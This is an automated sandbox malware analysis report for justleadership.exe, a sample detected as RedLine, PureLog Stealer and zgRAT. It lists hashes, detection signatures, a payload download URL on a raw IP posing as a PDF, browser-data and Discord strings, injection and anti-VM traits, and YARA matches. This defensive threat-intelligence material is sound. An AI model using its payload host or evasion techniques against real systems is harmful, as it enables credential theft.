Windows Analysis Report
justleadership.exe

Overview

General Information

Sample name: justleadership.exe
Analysis ID: 1534477
MD5: d84496a9a986a9425b66d64560d8f1e1
SHA1: fc41adcfe2cbbaafd65e1a7b817c8dbc3d1c3585
SHA256: e92953ea4524720f25dab095abcfea67bb3df1b26d4bec4c2c7084fc48d0e362
Tags: exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Downloads files with wrong headers with respect to MIME Content-Type
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: justleadership.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: justleadership.exe ReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: justleadership.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: justleadership.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: justleadership.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6CAFEh 0_2_06B6CA80
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6D3C5h 0_2_06B6D1F8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6CAFEh 0_2_06B6CA70
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6D3C5h 0_2_06B6D1EA
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FA19
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FA28
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FB87

Networking
barindex
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 20:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 09 Oct 2024 11:25:43 GMT ETag: "108410-6240983b13bc0" Accept-Ranges: bytes Content-Length: 1082384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: e8 58 54 3c 39 43 b0 fe ff ae ba fd dc 22 1e 8f af ab ea 4f 3f 50 90 03 e7 45 0a a8 7a ea 96 7f cd 54 a4 d8 2a a7 fe e4 c5 f2 5b 6a e7 d3 6c 2a 4c d5 71 f7 6e 31 c3 3d 31 f1 0f 50 5f 9a 2f e8 2d 89 d1 ae d6 6b 98 2b e8 f8 21 c1 e4 e0 2b a3 11 f1 3b d1 76 33 8e 75 87 2e d7 0e 39 68 a6 e4 16 c9 90 8a 5d 0b 7b 54 85 55 49 54 b0 8a b1 ec 4e 9d 2a 87 6c 14 fb 09 c9 71 0f 6b 3e f3 bc 4f f7 02 84 c0 7e 44 f5 d0 74 af 89 b0 51 55 c3 3c 9d 7d e5 62 23 47 51 05 31 3a d7 e8 e3 ce 55 18 3a fe bf 68 aa 93 21 e6 99 2d c9 30 98 18 6f 73 42 7f 81 e7 38 fa 40 44 16 1c 5a 97 05 44 59 ac 52 04 42 8a ff 27 1f 1e 51 8e ce 24 66 5f ce 9f f3 5a f0 51 a5 49 1e b0 dd b9 32 89 92 72 e3 40 c6 b8 66 cd ac 25 3c 74 06 14 91 92 48 15 22 f7 56 88 79 6e d7 aa 5d 40 4a ab da 43 35 0d 19 2b f0 e9 cc 99 28 6d 1c 37 b9 f1 49 82 e6 3a 07 2e ba 87 fc e2 14 be 59 cd 43 75 9d 2a c9 97 b4 3b 8e da 4e 81 ab 5e c8 4c 92 dd 4b f7 bb 84 4a d6 76 52 00 81 ec d3 c0 da 14 7f 45 b8 19 ac 1b 6b c6 5d 5c c3 e1 bc dc 8c 25 f8 9e e2 53 40 08 09 81 f2 d8 db cf 45 62 c2 5b 98 5d 0e 0a 69 85 79 df 34 7b 50 3f 10 2c e5 40 4a bd eb ac 4b a3 ed 88 48 51 d6 aa 56 57 8b 5c 5e 02 a5 3e 79 71 4c ae 15 e9 20 0f 99 55 1e 01 33 34 e0 25 52 46 b3 90 be 7c 85 20 b4 0a 46 fd f6 12 d8 3a 38 2f a1 e7 82 05 6a 09 42 37 39 81 2d 12 f9 88 81 3b 48 31 38 b9 ff 1d 35 22 63 de a3 a7 9b 44 5a 27 7e 09 e0 1a c8 89 22 4a fa f5 f5 d4 48 3e a3 ac a0 82 8a 37 ef 39 18 19 a3 6b 5c e3 6f f3 24 39 d5 c8 56 24 ec 7d e2 a5 82 98 5f ce 06 0f 1e 1f 69 01 32 9e 12 2b 98 7e 21 f7 77 0a 9d e6 81 53 ec f7 ea 86 69 ab 5e de db 45 06 8f a8 95 83 5b b6 7f 5d f1 ae 3b 4f 5e 37 18 28 91 70 75 fe 3d cd ef 88 5f 35 2f e9 31 a3 16 89 40 32 cf d3 80 6d 30 b1 64 7a 57 de f1 17 92 18 5a 38 6c 30 1c eb 34 94 ca c6 f8 2e d2 a3 7d 8e e6 aa 7c 9c 5c 09 44 f1 01 d6 b4 aa 2b a5 9d c5 fb 14 bb 70 22 95 f5 9c 6d 9d 39 f2 43 97 d6 60 20 b5 cf 68 a6 e9 94 8d 9f f4 4c 71 32 5f 4d b0 1e e6 16 49 5d 40 25 e1 6a b6 08 9d c7 cf 52 3a 08 2b 0e 20 69 a5 51 30 75 8b 80 be 71 cb 06 e0 34 6b 00 34 7c 53 94 0e 85 87 57 e5 ed 23 4b 0f 65 de b3 07 f4 ba 31 57 c2 6a 00 68 e0 ed 5b eb bd 09 45 a6 48 f9 77 8b 8b 65 b9 39 30 75 ef 45 dd a1 73 6e 93 5a 20 21 9d 8e fa 77 2f 75 06 03 ce a3 b6 52 60 ec 39 69 6a bf b4 02 63 92 58 fe a2 18 06 f1 9f e7 1b 17 f4 8d f5 09 19 c1 fb 7c 73 4b 72 b7 97 44 6d a3 e1 9a 1c d9 03 f4 b2 69 3d 11 3b 84 70 92 98 74 33 a1 82 83 6b 08 95 06 fa aa eb 8f bb 83 e8 3d 1c 81 4a ae 93 7c d2 44 7d 0d ea b7 da 9a 4b 27 f4 5f 65 d8 64 09 f1 f5 ef 0a a6 4b 6c 0d 56 80 12 2b c6 df 12 95 76 21 c4 7d 69 2c d8 7f 18 13 d7 99 52 4d 9f ad a2 ad a2 48 6f 71 03 4a 16 cc 3a dc 86 78 26 fc 08 99 66 3c 33 e0 f3 3e f7 c9 06 a5 6c c2 fe d6 e3 15 89 ab af b7 24 09 99 0a d1 04 67 3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /mime/Fwkbz.pdf HTTP/1.1Host: 91.208.206.5Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: global traffic HTTP traffic detected: GET /mime/Fwkbz.pdf HTTP/1.1Host: 91.208.206.5Connection: Keep-Alive
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $kq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `,kq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.208.206.5
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.208.206.5/mime/Fwkbz.pdf
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: justleadership.exe, 00000004.00000002.2156474669.0000000006410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htms
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.s
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D38430 NtResumeThread, 0_2_06D38430
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D37380 NtProtectVirtualMemory, 0_2_06D37380
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D38428 NtResumeThread, 0_2_06D38428
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D37379 NtProtectVirtualMemory, 0_2_06D37379
Detected potential crypto function
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173F6B0 0_2_0173F6B0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173D6C4 0_2_0173D6C4
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173F6A2 0_2_0173F6A2
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A45F12 0_2_06A45F12
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4D2F0 0_2_06A4D2F0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A43BF0 0_2_06A43BF0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4730C 0_2_06A4730C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4A440 0_2_06A4A440
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4A450 0_2_06A4A450
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A43BE1 0_2_06A43BE1
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4CB48 0_2_06A4CB48
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A40007 0_2_06A40007
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A40040 0_2_06A40040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A967B0 0_2_06A967B0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B6A0 0_2_06A9B6A0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B693 0_2_06A9B693
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A967A1 0_2_06A967A1
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B0E8 0_2_06A9B0E8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B0D9 0_2_06A9B0D9
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B6DCCD 0_2_06B6DCCD
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B6E3D0 0_2_06B6E3D0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B698B8 0_2_06B698B8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B80040 0_2_06B80040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B881C8 0_2_06B881C8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8C121 0_2_06B8C121
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8D738 0_2_06B8D738
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8C457 0_2_06B8C457
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B80006 0_2_06B80006
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B881B8 0_2_06B881B8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B88C33 0_2_06B88C33
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B88845 0_2_06B88845
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C00040 0_2_06C00040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C00034 0_2_06C00034
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D31E88 0_2_06D31E88
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34FB0 0_2_06D34FB0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3D2E0 0_2_06D3D2E0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3CA10 0_2_06D3CA10
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34310 0_2_06D34310
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3C6C8 0_2_06D3C6C8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D31E78 0_2_06D31E78
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34300 0_2_06D34300
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D33911 0_2_06D33911
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D33920 0_2_06D33920
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E8CE48 0_2_06E8CE48
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E70040 0_2_06E70040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E70006 0_2_06E70006
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A7740 4_2_018A7740
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A748B 4_2_018A748B
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A7498 4_2_018A7498
Sample file is different than original file name gathered from version info
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2123072673.0000000003644000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2119536181.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2157878459.0000000006870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs justleadership.exe
Source: justleadership.exe, 00000004.00000002.2147404072.0000000000456000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Uses 32bit PE files
Source: justleadership.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: justleadership.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
Source: justleadership.exe, Mfitkt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
